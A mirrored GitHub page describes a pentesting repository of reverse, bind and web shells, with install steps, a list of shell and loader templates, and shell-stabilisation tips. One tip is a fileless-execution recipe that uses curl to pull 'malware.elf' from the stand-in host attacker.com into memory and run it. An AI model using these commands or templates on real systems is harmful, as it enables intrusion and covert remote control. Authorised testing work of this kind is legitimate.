https://github.com/dadevel/shells

Collection of Reverse, Bind & Web Shells
https://github.com/dadevel/shells

bind-shell offsec pentesting reverse-shell web-shell

Last synced: about 1 month ago
JSON representation

Collection of Reverse, Bind & Web Shells

• Host: GitHub
• URL: https://github.com/dadevel/shells
• Owner: dadevel
• License: mit
• Created: 2022-03-30T21:30:11.000Z (about 3 years ago)
• Default Branch: main
• Last Pushed: 2025-03-06T05:43:23.000Z (3 months ago)
• Last Synced: 2025-03-31T09:12:01.536Z (2 months ago)
• Topics: bind-shell, offsec, pentesting, reverse-shell, web-shell
• Language: PHP
• Homepage:
• Size: 202 KB
• Stars: 10
• Watchers: 2
• Forks: 2
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
# Shells

![Demo](./assets/demo.gif)

A collection of reverse, bind and web shells from all over the internet.

## Setup

a) With [pipx](https://github.com/pypa/pipx).

~~~ bash

pipx install git+https://github.com/dadevel/shells.git@main

~~~

b) With `pip`.

~~~ bash

pip install --user git+https://github.com/dadevel/shells.git@main

~~~

## Usage

Just run `getshell` and select one of the many templates.

Some advanced templates require manual steps:

- [TCP reverse shell in C++ as Windows DLL](./getshell/templates/reverse/connector/windows-cpp/)

- [Cross-platform TCP reverse shell with Cosmopolitan Libc](./getshell/templates/reverse/connector/cosmopolitan/)

- [TCP reverse shell in Go](./getshell/templates/reverse/connector/golang/)

- [Reverse shell listener with Tmux and Socat](./getshell/templates/reverse/listener/tmux-socat-multiplexer/)

- [Python ELF loader via `memfd_create()` on Linux](./getshell/templates/exec/memfd-create.py)

- [Python shellcode loader on Linux](./getshell/templates/exec/mmap-ctype.py)

- [Meterpreter loader for Windows](./getshell/templates/exec/windows-minildr/)

## Tips

Metasploit payloads like `windows/shell_reverse_tcp` are one of the few reverse shells for Windows that support interactive commands.

### Linux PTY

Spawn a PTY and stabilize your shell with Python.

~~~ bash

python -c 'import pty;pty.spawn("/bin/bash")'

# ctrl+z

echo "stty sane;stty rows $LINES cols $COLUMNS;export TERM=xterm;" | xclip -sel clip

stty raw -echo && fg

# paste clipboard and press enter

~~~

Alternatively spawn a PTY with `script`.

~~~ bash

script -q -c /bin/bash /dev/null

~~~

### Linux memfd_create()

Create file in memory with Python 3.8 or newer ([source](https://twitter.com/randomdude999_/status/1629875560401780736)).

~~~

$ python3 -c "from os import*;fork()or(setsid(),print(f'/proc/{getpid()}/fd/{memfd_create(sep)}'),kill(0,19))"

/proc/139856/fd/3

$ curl -o /proc/139856/fd/3 https://attacker.com/malware.elf

$ /proc/139856/fd/3

~~~

### Other interesting tools

- [Kraken](https://github.com/kraken-ng/kraken), multi-language webshell

- [xc](https://github.com/xct/xc), reverse shell for Linux and Windows written in Go